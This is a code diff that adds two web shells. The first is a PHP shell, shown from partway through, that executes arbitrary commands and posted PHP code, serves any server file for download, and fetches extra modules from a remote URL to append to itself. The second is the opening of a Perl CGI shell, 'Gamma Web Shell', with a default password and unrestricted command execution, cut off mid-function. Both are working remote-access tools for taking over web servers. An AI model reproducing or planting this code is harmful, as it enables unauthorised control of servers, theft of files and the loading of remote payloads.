+  static $i=0;
+  echo "<form method='post' name='PostEmptyForm$i'>\n";
+  foreach($params as $n=>$v)
+    echo "<input type='hidden' name='$n' value='$v'>\n";
+  echo "</form>\n";
+  $i++;
+  return $i-1;
+}
+
+// Print single confirmation link
+function submit_empty_form($i, $name)
+{
+  echo "<a href='javascript:void(0);' onClick='document.PostEmptyForm$i.submit()'>$name</a>";
+}
+
+// Print single confirmation link with a confirmation message box
+function confirm_empty_form($i, $name, $msg)
+{
+  echo "<a href='javascript:void(0);' onClick='if(confirm(\"$msg\")){document.PostEmptyForm$i.submit()}'>$name</a>";
+}
+
+// Redirect to URL $to
+function redirect($to)
+{
+  echo "<meta http-equiv=\"refresh\" content=\"0;url='$to'\">";
+}
+
+// Get string containing file permissions in the form 'lrwxrwxrwx'
+function filesperms($file)
+{
+	$perms = fileperms($file);
+
+	if (($perms & 0xC000) == 0xC000) {
+	   // Socket
+	   $info = 's';
+	} elseif (($perms & 0xA000) == 0xA000) {
+	   // Symbolic Link
+	   $info = 'l';
+	} elseif (($perms & 0x8000) == 0x8000) {
+	   // Regular
+	   $info = '-';
+	} elseif (($perms & 0x6000) == 0x6000) {
+	   // Block special
+	   $info = 'b';
+	} elseif (($perms & 0x4000) == 0x4000) {
+	   // Directory
+	   $info = 'd';
+	} elseif (($perms & 0x2000) == 0x2000) {
+	   // Character special
+	   $info = 'c';
+	} elseif (($perms & 0x1000) == 0x1000) {
+	   // FIFO pipe
+	   $info = 'p';
+	} else {
+	   // Unknown
+	   $info = 'u';
+	}
+
+	// Owner
+	$info .= (($perms & 0x0100) ? 'r' : '-');
+	$info .= (($perms & 0x0080) ? 'w' : '-');
+	$info .= (($perms & 0x0040) ?
+	           (($perms & 0x0800) ? 's' : 'x' ) :
+	           (($perms & 0x0800) ? 'S' : '-'));
+
+	// Group
+	$info .= (($perms & 0x0020) ? 'r' : '-');
+	$info .= (($perms & 0x0010) ? 'w' : '-');
+	$info .= (($perms & 0x0008) ?
+	           (($perms & 0x0400) ? 's' : 'x' ) :
+	           (($perms & 0x0400) ? 'S' : '-'));
+
+	// World
+	$info .= (($perms & 0x0004) ? 'r' : '-');
+	$info .= (($perms & 0x0002) ? 'w' : '-');
+	$info .= (($perms & 0x0001) ?
+	           (($perms & 0x0200) ? 't' : 'x' ) :
+	           (($perms & 0x0200) ? 'T' : '-'));
+	return $info;
+}
+
+// Get string contaning file modification time
+function filesmtime($file)
+{
+  return date ("d M Y H:i:s", filemtime($file));
+}
+
+function headers()
+{
+return "{$_SERVER['REQUEST_METHOD']} {$_SERVER['PHP_SELF']} {$_SERVER['SERVER_PROTOCOL']}\\n
+Accept: {$_SERVER['HTTP_ACCEPT']}\\n
+Accept-Charset: {$_SERVER['HTTP_ACCEPT_CHARSET']}\\n
+Accept-Encoding: {$_SERVER['HTTP_ACCEPT_ENCODING']}\\n
+Accept-Language: {$_SERVER['HTTP_ACCEPT_LANGUAGE']}\\n
+Cache-Control: {$_SERVER['HTTP_CACHE_CONTROL']}\\n
+Connection: {$_SERVER['HTTP_CONNECTION']}\\n
+Host: {$_SERVER['HTTP_HOST']}\\n
+User-Agent: {$_SERVER['HTTP_USER_AGENT']}\\n
+";
+}
+
+if($_POST['act']=='toolz' && $_POST['subact']=='phpinfo')
+  die(phpinfo());
+
+if($_POST['act']=='downfile')
+{
+  $curdir = $_POST['curdir'];
+  $file = $_POST['file'];
+
+  if(!file_exists($curdir.'/'.$file))
+    die("Cannot find file ".$curdir.'/'.$file);
+  if(!is_file($curdir.'/'.$file))
+    die($curdir.'/'.$file." is not a regular file");
+
+  Header("Content-Type: application/x-octet-stream");
+  Header("Content-Disposition: attachement;filename=".$file);
+
+  die(join('', file($curdir.'/'.$file)));
+}
+
+if($_POST['act']=='preview')
+{
+  chdir($_POST['curdir']);
+  if(!file_exists($_POST['file']))
+    die("Can't find file");
+  $p=explode(".",$_POST['file']);
+  $ext=strtolower($p[count($p)-1]);
+  if(in_array($ext, array('png','jpg','jpeg','bmp','gif','tiff','pcx')))
+    Header("Content-Type: image/$ext");
+  elseif(in_array($ext, array('htm', 'html','plg')))
+    Header("Content-Type: text/html");
+  elseif(in_array($ext, array('php')))
+  { include($_POST['file']); die;}
+  else
+    Header("Content-Type: text/plain");
+  @readfile($_POST['file']);
+  die;
+}
+
+//---------------------------------
+// Headers
+//---------------------------------
+?>
+<html>
+<head>
+<title><?php echo $script_release;?></title>
+<style type='text/css'>
+A { text-decoration: none; color: white }
+</style>
+</head>
+<body bgcolor='black' vlink='blue' alink='blue' link='blue' text='white'>
+<noscript><br><br><br><h1 align='center'><font color='red'>You need JavaScript to be enabled to run this page!</font></h1><br><br><br></noscript>
+<?php // Navigation ?>
+<center>
+<table border=0 width=100%><tr><td><table border=0><tr>
+<form method='post' name='main_empty_form'><input type='hidden' name='act'><input type='hidden' name='curdir'><input type='hidden' name='file'><input type='hidden' name='subact'></form>
+<?php
+echo "<td><b>";
+post_form("Shell", array(), "", " |");
+
+$mod_loaded = array();
+foreach($modules as $module=>$name)
+{
+  if(function_exists("mod_".$module))
+  {
+    echo "</b><td><b>";
+    post_form($name, array("act" => $module), "", " |");
+    $mod_loaded[] = $module;
+  }
+}
+
+echo "</b><td><b>";
+post_form("Toolz", array("act" => "toolz"));
+
+echo "</table><td align=right width=50%>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<table style='border: 1px solid' width=100%><tr><td>";
+echo "<b>Modules installed:</b>&nbsp;&nbsp;&nbsp;";
+$first = 1;
+foreach($mod_loaded as $module)
+{
+  if(!$first)
+    echo ", ";
+  if($module==$_POST['act'])
+    echo "<b>".$module."</b>";
+  else
+    echo $module;
+  $first=0;
+}
+if($first==1)
+  echo "None";
+?>
+<td align=right>
+<?php
+if(file_exists("grp_repair.php"))
+  echo "<input type='button' value='Repair' onClick='window.top.location.href=\"grp_repair.php\";' /><input type='button' value='Delete Repair' onClick='window.top.location.href=\"grp_repair.php?delete\";' /> ";
+?>
+<input type='button' value='Load more...' onClick='document.main_empty_form.act.value="load_modules";document.main_empty_form.submit();' />
+</table></table>
+</center>
+<p>
+<table border=0>
+<tr><td>
+<table style='border: 1px solid' cellspacing=5>
+<tr><td colspan=2 align='center'><b>Server information</b>
+<tr><td>
+<?php
+$os = "unk";
+$safe = @ini_get("safe_mode");
+
+if($safe==1)
+{
+	echo "<b>Safe Mode</b>&nbsp;&nbsp;<td>On<tr><td>";
+}
+else
+{
+	echo "<b>Operating system</b>&nbsp;&nbsp;<td>";
+	$ver = exec("ver");
+	if(substr($ver, 0, 9) == "Microsoft")
+	{
+	  echo $ver;
+	  $os = "win";
+	}
+	else
+	{
+	  $id = exec("id");
+	  if(substr($id, 0, 3) == "uid")
+	  {
+	    echo exec("uname -srn");
+	    $os = "nix";
+	  }
+	  else
+	    echo "Unknown, not a Windows ";
+	}
+	
+	if($os == "nix")
+	{
+	  echo "<tr><td><b>id<b>&nbsp;&nbsp;<td>".exec("id")."</tr>";
+	}
+}
+echo "<tr><td><b>Server software</b>&nbsp;&nbsp;<td>{$_SERVER['SERVER_SOFTWARE']}";
+
+if($os == "nix")
+{
+  $pwd = exec("pwd");
+  $defcmd = "ls -liaF";
+}
+elseif($os == "win")
+{
+  $pwd = exec("cd");
+  $defcmd = "dir";
+}
+
+if(empty($pwd))
+  $pwd = getcwd();
+
+?>
+</table>
+<td>
+<table style='border: 1px solid' cellspacing=5>
+<tr><td colspan=2 align='center'><b>Client information</b>
+<tr><td><b>Client's IP</b>&nbsp;&nbsp;<td><a href="javascript:alert('Host: <?php echo gethostbyname($_SERVER['REMOTE_ADDR']); ?>');"><?php echo $_SERVER['REMOTE_ADDR'];?></a>
+<tr><td><b>Client's browser</b>&nbsp;&nbsp;<td><a href="javascript: alert('HTTP Headers:\n\n<?php echo headers(); ?>');"><?php echo htmlspecialchars($_SERVER['HTTP_USER_AGENT']);?></a>
+</table>
+</table>
+<p>
+<?php
+//---------------------------------
+// Parse parameters. Initializing.
+//---------------------------------
+
+// Register globals
+if (ini_get('register_globals') != '1')
+{
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+//---------------------------------
+// Select action
+//---------------------------------
+
+
+// Toolz
+if($_POST['act'] == 'toolz')
+{
+?>
+<h3>Tools</h3>
+<?php
+$n1 = post_empty_form(array("act" => "toolz", "subact" => "phpinfo"));
+$n2 = post_empty_form(array("act" => "toolz", "subact" => "phpcode"));
+?>
+<ul>
+<li><?php submit_empty_form($n1, "Phpinfo"); ?>
+<li><?php submit_empty_form($n2, "Evaluate php code"); ?>
+</ul>
+<?php
+
+if($_POST['subact'] == "phpcode")
+{
+  if(!isset($_POST['code']))
+    $_POST['code'] = 'print_r($_SERVER);';
+  echo "<br /><form method='post' name='phpcode'>
+        <input type='hidden' name='act' value='toolz'>
+        <input type='hidden' name='subact' value='phpcode'>
+        <input type='checkbox' name='pre'".(($_POST['pre']=="on")?" checked":"").">
+         <a href=\"javascript:void(0);\" onClick=\"document.phpcode.pre.checked=!document.phpcode.pre.checked\">Append &lt;pre&gt; tags</a><br>
+        <textarea name='code' cols=70 rows=20>{$_POST['code']}</textarea>
+        <br />
+        <input type='submit' name='go' value='Eval'>
+        </form>";
+  if(isset($_POST['go']))
+  {
+    echo "<p>Result is:<br />";
+    if($_POST['pre']=="on")
+    {
+      echo "<pre>";
+      eval($_POST['code']);
+      echo "</pre>";
+    }
+    else
+      echo eval($_POST['code']);
+  }
+
+}
+?>
+</ul>
+<?php
+}
+
+elseif(function_exists("mod_".$_POST['act']))
+{
+  eval("mod_".$_POST['act']."();");
+}
+
+elseif($_POST['act']=="load_modules")
+{
+  echo "<h3>Module loader</h3>";
+  if($_POST['subact']=='autoload')
+  {
+    $mod = join('', file($modules_base."mod_".$_POST['module'].".txt"));
+    if($mod===false)
+      die("Module is unavailable");
+    //echo "Module:<br><textarea cols=50 rows=10 readonly>".htmlspecialchars($mod)."</textarea>";
+    $parts = explode('/', $_SERVER['PHP_SELF']);
+    $name = $parts[count($parts)-1];
+
+    // Backup
+    copy($name, "~".$name);
+
+    $f = fopen("grp_repair.php", "w");
+    if($f)
+    {
+      $crlf = "\r\n";
+      fwrite($f, '<?php'.$crlf.'$name="'.$name.'";'.$crlf.'if($_SERVER[QUERY_STRING]=="delete") {unlink("grp_repair.php");unlink("~".$name);}else{'.$crlf.'unlink($name);'.$crlf.'rename("~".$name, $name);'.$crlf.'unlink("grp_repair.php");}'.$crlf.'?>'."<meta http-equiv=\"refresh\" content=\"0;url='$name'\">");
+      fclose($f);
+      $repair=1;
+    }
+    else $repair=0;
+
+    $sh = fopen($name, "a+") or die("Can't open ".$name." to append module");;
+    fwrite($sh, $mod);
+    fclose($sh);
+    echo "<b><font color='green'>Module installed successfully</font></b><br /><b>WARNING!</b> Shell file has been backuped. If you'll have problems with installed module, you can ";
+    if($repair)
+      echo "run 'grp_repair.php' to forget changes";
+    else
+      echo "backup file manually from '~".$name."' (shell was unable to create self-repairing module)";
+    echo "<br /><small>You'll be automatically redirected in 3 seconds</small><meta http-equiv=\"refresh\" content=\"3;url=''\">";
+  }
+
+  else
+  {
+    echo "<b>Supported modules are</b>: ";
+    $first = 1;
+    foreach($modules as $module=>$name)
+    {
+      if(!$first)
+        echo ", ";
+      echo $name." (".$module.")";
+      $first=0;
+    }
+    if($first==1)
+      echo "None";
+    echo "<br /><b>Modules base load URL</b>: $modules_base<p><font color='gray'><b>Modules can be installed:</b></font>
+          (<font color='green'>Ready</font>, <font color='red'>Failure</font>)<br />";
+    foreach($modules as $module=>$name)
+    {
+      $mod_form[$module] = post_empty_form(array('act' => 'load_modules', 'subact' => 'autoload', 'module' => $module));
+    }
+    echo "<table border=0>";
+    foreach($modules as $module=>$name)
+    {
+      $pre  = "<font color='green'>";
+      $post = "</font>";
+      $mod = @join('', @file($modules_base."mod_".$module.".txt"));
+      if(!preg_match("#function mod_#i", $mod))
+        $pre  = "<font color='red'>";
+
+      echo "<tr><td>".$pre.$name." (".$module.")".$post."<td><a href='".$modules_base."mod_".$module.".txt' target=_blank>[SOURCE]</a><td>";
+
+      if(function_exists("mod_".$module))
+        echo "<font color='gray'>[ALREADY INSTALLED]</font>";
+      elseif($pre == "<font color='green'>")
+        submit_empty_form($mod_form[$module], "[INSTALL]");
+      else
+        echo "<font color='gray'>[CAN'T INSTALL]</font>";
+      echo "</tr>";
+    }
+    echo "</table>";
+  }
+}
+
+// Shell
+else
+{
+	// First we check if there has been asked for a working directory
+	if (!empty($work_dir)) {
+	  // A workdir has been asked for
+	  if (!empty($command)) {
+	    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+	      // We try and match a cd command
+	      if ($regs[1][0] == '/') {
+	        $new_dir = $regs[1]; // 'cd /something/...'
+	      } else {
+	        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+	      }
+	      if (file_exists($new_dir) && is_dir($new_dir)) {
+	        $work_dir = $new_dir;
+	      }
+	      unset($command);
+	    }
+	  }
+	}
+
+unset($curdir);
+if($safe == 1)
+{
+  die("<font color='red'><b>Safe mode is turned On! Command line is unavailable</b></font>");
+}
+
+if(isset($_POST["curdir"]))
+  $curdir = $_POST["curdir"];
+else
+  $curdir = $pwd;
+if($os == "win")
+  $curdir = str_replace("/", "\\", $curdir);
+?>
+<form name="execform" method="post">
+<table border=0>
+<tr><td>Command: <td><input type="text" name="command" size="60" value="<?php echo ($_POST["command"]=="")?$defcmd:$_POST["command"];?>">
+    <td><a href="#" onClick="document.execform.command.value='<?php echo $defcmd;?>'">Set default [<?php echo $defcmd; ?>]</a>
+<tr><td><a href="#" onClick="document.execform.stderr.checked=!document.execform.stderr.checked">Disable stderr-grabbing?</a><td><input type="checkbox" name="stderr"<?php echo ($_POST["stderr"]=="on")?" checked":"";?>>
+<tr><td>Working directory:<td><input type="text" name="curdir" size="60" value="<?php echo $curdir;?>">
+    <td><a href="#" onClick="document.execform.curdir.value='<?php echo addslashes($pwd);?>'">Restore as home directory [<?php echo htmlspecialchars($pwd); ?>]</a>
+<tr><td colspan=2><input name="submit_btn" type="submit" value="Execute Command">
+</table>
+</form>
+<textarea cols="80" rows="29" readonly>
+<?php
+function excmd($cmd)
+{
+  if(function_exists("system"))
+  { system($cmd); return true; }
+  if(function_exists("exec"))
+  { exec($cmd, $var); echo join("\n", $var); return true; }
+  if(function_exists("passthru"))
+  { passthru($cmd); return true; }
+  return false;
+}
+if (!empty($command)) {
+  if (!$stderr)
+    $command .= " 2>&1";
+  if($os == "nix")
+    excmd("cd $curdir; $command");
+  elseif($os == "win")
+    excmd("cd $curdir & $command");
+  elseif($os == "unk")
+  {
+    chdir($curdir);
+    excmd($command);
+  }
+}
+?>
+</textarea>
+</form>
+<script language="JavaScript" type="text/javascript">
+document.execform.command.focus();
+</script>
+<?php
+}
+
+//---------------------------------
+// Footer
+//---------------------------------
+?>
+</body>
+</html>
+
+<?php // Is it really very interesting? :) ?>

php/Gamma Web Shell.php

@@ -0,0 +1,869 @@
+#!/usr/bin/perl
+###############################################################################
+### Gamma Web Shell
+### Copyright 2003 Gamma Group
+### All rights reserved
+###
+### Gamma Web Shell is free for both commercial and non commercial
+### use. You may modify this script as you find necessary as long
+### as you do not sell it. Redistribution is not allowed without
+### prior consent from Gamma Group (support@gammacenter.com).
+### 
+### Gamma Group <http://www.gammacenter.com>
+###
+
+use strict;
+
+###############################################################################
+
+package WebShell::Configuration;
+
+use vars qw($password $restricted_mode $ok_commands);
+
+##
+## Password.
+## Set to blank if you don't need password protection.
+##
+$password = "changeme";
+
+##
+## Restricted mode.
+## Set to "1" to allow only a limited set of commands.
+##
+$restricted_mode = 0;
+
+##
+## Available commands.
+## The list of available commands for the restricted mode.
+##
+$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];
+
+###############################################################################
+
+package WebShell::Templates;
+
+use vars qw($LOGIN_TEMPLATE $INPUT_TEMPLATE $EXECUTE_TEMPLATE $BROWSE_TEMPLATE);
+
+my $VERSION = 'Gamma Web Shell 1.3';
+
+my $STYLESHEET = <<EOT;
+body {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 90%;
+  color: #000;
+  background: #FFF;
+  margin: 0px;
+  padding: 0px;
+}
+
+h1, h2, h3, h4, h5, h6 {
+  margin: 0.3em;
+  padding: 0px;
+}
+
+input, select, textarea, select {
+  font-family: Verdana, Helvetica, sans-serif;
+  font-size: 100%;
+  margin: 1px;
+  padding: 0px 1px;
+}
+
+pre, code, tt {
+  font-family: 'Courier New', Courier, monospace;
+  font-size: 100%;
+}
+
+form {
+  margin: 0px;
+  padding: 0px;
+}
+
+table {
+  font-size: 100%;
+}
+
+a {
+  text-decoration: none;
+  color: #000;
+  background: transparent;
+}
+
+a:hover {
+  text-decoration: underline;
+}
+
+.header, .footer {
+  color: #000;
+  background: #CCF;
+  margin: 0px;
+  padding: 0px;
+  text-align: center;
+  border: solid #000;
+  border-width: 1px 0px;
+}
+
+.box {
+  border: 1px solid #000;
+  border-collapse: collapse;
+  color: #000;
+  background: #CCF;
+}
+
+.box-header, .box-content, .box-text, .box-error, .box-menu {
+  border: 1px solid #000;
+}
+
+.box-header, .box-header a {
+  color: #FFF;
+  background: #000;
+}
+
+.box-content {
+  text-align: center;
+}
+
+.box-text {
+  padding: 3px 10px;
+  font-size: 90%;
+}
+
+.box-menu {
+  padding: 3px 10px;
+}
+
+.box-error {
+  color: #FFF;
+  background: #F00;
+  font-weight: bold;
+  padding: 3px 25px;
+  text-align: center;
+}
+
+.dialog {
+  text-align: left;
+  border-collapse: collapse;
+}
+
+.dialog-even {
+  color: #000;
+  background: #CCF;
+}
+
+.dialog-odd {
+  color: #000;
+  background: #AAE;
+}
+
+.menu {
+  font-weight: normal;
+}
+
+.menu-selected {
+  font-weight: bold;
+}
+
+.tool {
+  background: transparent;
+  color: #000;
+  border-style: hidden;
+  border-width: 1px;
+  text-decoration: none;
+}
+
+.tool:hover {
+  border-style: outset;
+  text-decoration: none;
+}
+
+.output {
+  color: #FFF;
+  background: #000;
+  padding: 1em;
+  font-weight: bold;
+}
+
+.output-text {
+}
+
+.output-command {
+  color: #FF7;
+  background: #000;
+}
+
+.output-error {
+  color: #FFF;
+  background: #F00;
+}
+
+.entries {
+  border: 1px solid #777;
+  border-collapse: collapse;
+}
+
+.entries td, .entries th {
+  padding: 2px 10px;
+}
+
+.entries th, .entries td {
+  border: 1px solid #777;
+}
+
+.entries-even {
+    color: #FFF;
+    background: #444;
+}
+
+.entry-dir a {
+  color: #BBF;
+  background: transparent;
+}
+
+.entry-exec {
+  color: #BFB;
+  background: transparent;
+}
+
+.entry-file {
+}
+
+.entry-mine {
+}
+
+.entry-alien {
+  color: #FBB;
+  background: transparent;
+}
+
+EOT
+
+$LOGIN_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <form action="WebShell.cgi" method="POST">
+                        <table class="box">
+                            <tr><th class="box-header">Login</th></tr>
+                            [% if error %]
+                                <tr><td class="box-error">Invalid password!</td></tr>
+                            [% end %]
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <td>Password:</td>
+                                            <td><input name="password" type="password"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                            <tr>
+                                <td class="box-content">
+                                    <input class="tool" type="submit" value="OK">
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$INPUT_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body>
+        <table width="100%" height="100%">
+            <tr><td class="header"><h2>$VERSION</h2></td></tr>
+            <tr>
+                <td width="100%" height="100%" align="center" valign="center">
+                    <iframe name="output" src="WebShell.cgi?action=execute" width="80%" height="80%"></iframe>
+                    <br><br>
+                    <script type="text/javascript">
+                        function submit_execute() {
+                            var entry = document.forms.execute.elements['command'];
+                            if (entry.value.length > 0) {
+                                entry.select();
+                                entry.focus();
+                                document.forms.execute.elements['action'].value = 'execute';
+                                return true;
+                            }
+                            else {
+                                return false;
+                            }
+                        }
+                        function submit_browse() {
+                            document.forms.execute.elements['action'].value = 'browse';
+                        }
+                    </script>
+                    <form name="execute" action="WebShell.cgi" method="POST" target="output">
+                        <input name="action" type="hidden" value="execute">
+                        <table class="box">
+                            <tr>
+                                <td class="box-content">
+                                    <table class="dialog" width="100%">
+                                        <tr>
+                                            <th>Command:</th>
+                                            <td><input name="command" type="text" size="50"></td>
+                                            <td><input class="tool" type="submit" value="Execute" onClick="return submit_execute()"></td>
+                                            <td><input class="tool" type="submit" value="Browse" onClick="return submit_browse()"></td>
+                                        </tr>
+                                    </table>
+                                </td>
+                            </tr>
+                        </table>
+                    </form>
+                </td>
+            </tr>
+            <tr><td class="footer"><h5>Copyright &copy; 2003 <a href="http://www.gammacenter.com/">Gamma Group</a></h5></td></tr>
+        </table>    
+    </body>
+</html>
+EOT
+
+$EXECUTE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if old_line %]
+            <pre class="output-command">[% old_line as html %]</pre>
+        [% end %]
+        [% if output %]
+            <pre class="output-text">[% output as html %]</pre>
+        [% end %]
+        [% if error %]
+            <pre class="output-error">[% error as html %]</pre>
+        [% end %]
+        [% if new_line %]
+            <pre class="output-command">[% new_line as html %]</pre>
+        [% end %]
+    </body>
+</html>
+EOT
+
+$BROWSE_TEMPLATE = <<EOT;
+<html>
+    <head>
+        <title>Gamma Web Shell</title>
+        <style type="text/css">$STYLESHEET</style>
+    </head>
+    <body class="output">
+        [% if error %]
+            <p class="output-error">[% error as html %]</p>
+        [% end %]
+        <table class="entries" width="100%">
+            <tr class="entries-even" align="left">
+                <th colspan="6">
+                    [% for entry in directory %]<code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.path as url %]">[% entry.name as html %]/</a></code>[% end %]
+                </th>
+            </tr>
+            <tr class="entries-odd" align="left">
+                <th width="100%"><small>Name</small></th>
+                <th><small>Size</small></th>
+                <th><small>Time</small></th>
+                <th><small>Owner</small></th>
+                <th><small>Group</small></th>
+                <th><small>Mode</small></th>
+            </tr>
+            [% for entry in entries %]
+                <tr class="entries-[% if loop.entry.even %]even[% else %]odd[% end %]">
+                    <td width="100%">
+                        [% if entry.type_file %]
+                            [% if entry.type_exec %]
+                                <code class="entry-exec">[% entry.name as html %]</code>
+                            [% else %]
+                                <code class="entry-file">[% entry.name as html %]</code>
+                            [% end %]
+                        [% elif entry.type_dir %]
+                            <code class="entry-dir"><a href="WebShell.cgi?action=browse&path=[% entry.name as url %]">[% entry.name as html %]/</a></code>
+                        [% else %]
+                            <code class="entry-other">[% entry.name as html %]</code>
+                        [% end %]
+                    </td>
+                    <td align="right">
+                        [% if entry.type_file %]
+                            <code class="entry-text">[% entry.size as html %]</code></td>
+                        [% else %]
+                        &nbsp;
+                        [% end %]
+                    </td>
+                    <td><code class="entry-text">[% entry.time as nbsp %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.user as html %]</code></td>
+                    <td><code class="entry-[% if entry.all_rights %]mine[% else %]alien[% end %]">[% entry.group as html %]</code></td>
+                    <td><code class="entry-text">[% entry.mode as html %]</code></td>
+                </tr>
+            [% end %]
+        </table>
+    </body>
+</html>
+EOT
+
+
+###############################################################################
+
+package WebShell::MiniXIT;
+
+sub new {
+    my ($class) = @_;
+    return bless {}, $class;
+}
+
+sub substitute {
+    my ($self, $input, %keywords) = @_;
+    my $statements = $self->parse($input);
+    my $operation = $self->compile($statements);
+    my $output = $self->evaluate($operation, \%keywords);
+    return $output;
+}
+
+sub parse {
+    my ($self, $input) = @_;
+    my $statements = [];
+    my $start = 0;
+    while ($input =~ /(\[%\s*(.*?)\s*%\])/g) {
+        my $match_end = pos($input);
+        my $match_start = $match_end - length($1);
+        if ($start < $match_start) {
+            my $text = substr($input, $start, $match_start-$start);
+            push @$statements, { id => 'text', text => $text };
+        }
+        push @$statements, $self->parse_command($2);
+        $start = $match_end;
+    }
+    if ($start < length($input)) {
+        my $text = substr($input, $start);
+        push @$statements, { id => 'text', text => $text };
+    }
+    return $statements;
+}
+
+sub parse_command {
+    my ($self, $command) = @_;
+    if ($command =~ /^if\s+(\w+(\.\w+)*)$/) {
+        return { id => 'if', test => $1, };
+    }
+    elsif ($command =~ /^elif\s+(\w+(\.\w+)*)$/) {
+        return { id => 'elif', test => $1 };
+    }
+    elsif ($command =~ /^else$/) {
+        return { id => 'else' };
+    }
+    elsif ($command =~ /^for\s+(\w+)\s+in\s+(\w+(\.\w+)*)$/) {
+        return { id => 'for', name => $1, list => $2 };
+    }
+    elsif ($command =~ /^end$/) {
+        return { id => 'end' };
+    }
+    elsif ($command =~ /^(\w+(\.\w+)*)(\s+as\s+(\w+))$/) {
+        return { id => 'print', variable => $1, format => $4 };
+    }
+    else {
+        die "invalid command: '$command'";
+    }
+}
+
+sub compile {
+    my ($self, $statements) = @_;
+    my $operation = $self->compile_sequence($statements);
+    if (scalar(@$statements)) {
+        my $statement = shift(@$statements);
+        my $id = $statements->{id};
+        die "unexpected statement: '$id'";
+    }
+    return $operation;
+}
+
+sub compile_sequence {
+    my ($self, $statements) = @_;
+    my $operations = [];
+    while (scalar(@$statements) > 0) {
+        my $id = $statements->[0]->{id};
+        if ($id eq 'if') {
+            push @$operations, $self->compile_condition($statements);
+        }
+        elsif ($id eq 'for') {
+            push @$operations, $self->compile_loop($statements);
+        }
+        elsif ($id eq 'print' or $id eq 'text') {
+            my $statement = shift @$statements;
+            push @$operations, $statement;
+        }
+        else {
+            last;
+        }
+    }
+    return { id => 'sequence', operations => $operations };
+}
+
+sub compile_condition {
+    my ($self, $statements) = @_;
+    my $conditions = [];
+    my $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    while ($id eq 'if' or $id eq 'elif' or $id eq 'else') {
+        my $test = $id ne 'else' ? $statement->{test} : undef;
+        my $operation = $self->compile_sequence($statements);
+        push @$conditions, { test => $test, operation => $operation };
+        $statement = shift @$statements;
+        $id = defined $statement ? $statement->{id} : 'none';
+    }
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'condition', conditions => $conditions };
+}
+
+sub compile_loop {
+    my ($self, $statements) = @_;
+    my $statement = shift @$statements;
+    my $name = $statement->{name};
+    my $list = $statement->{list};
+    my $operation = $self->compile_sequence($statements);
+    $statement = shift @$statements;
+    my $id = defined $statement ? $statement->{id} : 'none';
+    die "'end' expected, but '$id' found" unless $id eq 'end';
+    return { id => 'loop',
+        name => $name, list => $list, operation => $operation };
+}
+
+sub evaluate {
+    my ($self, $operation, $keywords) = @_;
+    $keywords->{loop} = {};
+    my $chunks = $self->evaluate_operation($operation, $keywords);
+    return join('', @$chunks);
+}
+
+sub evaluate_operation {
+    my ($self, $operation, $keywords) = @_;
+    if ($operation->{id} eq 'condition') {
+        return $self->evaluate_condition($operation->{conditions}, $keywords);
+    }
+    elsif ($operation->{id} eq 'loop') {
+        return $self->evaluate_loop($operation->{name}, $operation->{list},
+                $operation->{operation}, $keywords);
+    }
+    elsif ($operation->{id} eq 'print') {
+        return $self->evaluate_print($operation->{variable},
+                $operation->{format}, $keywords);
+    }
+    elsif ($operation->{id} eq 'sequence') {
+        my $chunks = [];
+        push @$chunks, @{$self->evaluate_operation($_, $keywords)}
+                for (@{$operation->{operations}});
+        return $chunks;
+    }
+    elsif ($operation->{id} eq 'text') {
+        return [$operation->{text}];
+    }
+}
+
+sub evaluate_condition {
+    my ($self, $conditions, $keywords) = @_;
+    for my $condition (@$conditions) {
+        my $test = $condition->{test};
+        my $value = defined $test ?
+                $self->evaluate_variable($test, $keywords) : 1;
+        return $self->evaluate_operation($condition->{operation}, $keywords)
+                    if $value;
+    }
+    return [];
+}
+
+sub evaluate_loop {
+    my ($self, $name, $list, $operation, $keywords) = @_;
+    my $values = $self->evaluate_variable($list, $keywords);
+    my $length = scalar(@$values);
+    my $index = 0;
+    my $chunks = [];
+    for my $value (@$values) {
+        $keywords->{$name} = $value;
+        $keywords->{loop}->{$name} = {
+            index => $index, number => $index+1,
+            first => $index == 0, last => $index == $length-1,
+            odd => $index % 2 == 1, even => $index % 2 == 0,
+        };
+        push @$chunks, @{$self->evaluate_operation($operation, $keywords)};
+        $index++;
+    }
+    delete $keywords->{$name};
+    delete $keywords->{loop}->{$name};
+    return $chunks;
+}
+
+sub evaluate_print {
+    my ($self, $variable, $format, $keywords) = @_;
+    my $value = $self->evaluate_variable($variable, $keywords);
+    if ($format eq 'html') {
+        for ($value) { s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; }
+    }
+    elsif ($format eq 'nbsp') {
+        for ($value) {
+            s/&/&amp;/g; s/</&lt;/g; s/>/&gt;/g; s/"/&quot;/g; s/ /&nbsp;/g;
+        }
+    }
+    elsif ($format eq 'url') {
